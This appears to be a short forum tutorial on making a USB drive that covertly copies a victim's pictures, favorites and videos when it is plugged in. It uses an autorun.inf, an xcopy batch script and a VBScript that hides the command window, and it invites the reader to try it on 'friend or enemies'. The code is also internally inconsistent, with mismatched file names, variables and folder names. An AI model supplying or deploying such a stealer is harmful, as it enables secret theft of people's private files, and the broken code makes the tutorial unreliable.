Step 1 :
Open Notepad (I recommend Notepad++) and copy & paste the following lines.
Quote:Save it as autorun.inf
[autorun]
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Its action= command is optional but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
Step 2:
Open Notepad again and copy-paste the following lines
Quote:
@echo offSave this as file.bat
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
This file is configured to copy the contents of the current users favorites, pictures, and videos folder to the USB drive under a folder called 'data'. This is the section of the code you will need to edit depending on what you want to copy.
First file path "%USERPROFILE%\pictures" – is the target.
Second file path "%drive%\all\My pics" – is the destination.
Quote:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
Quote:wscript.exe \invisible.vbs file.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
This is all done. Test the USB Pen drive on your own computer first before playing it out on your friend or enemies. It works amazingly.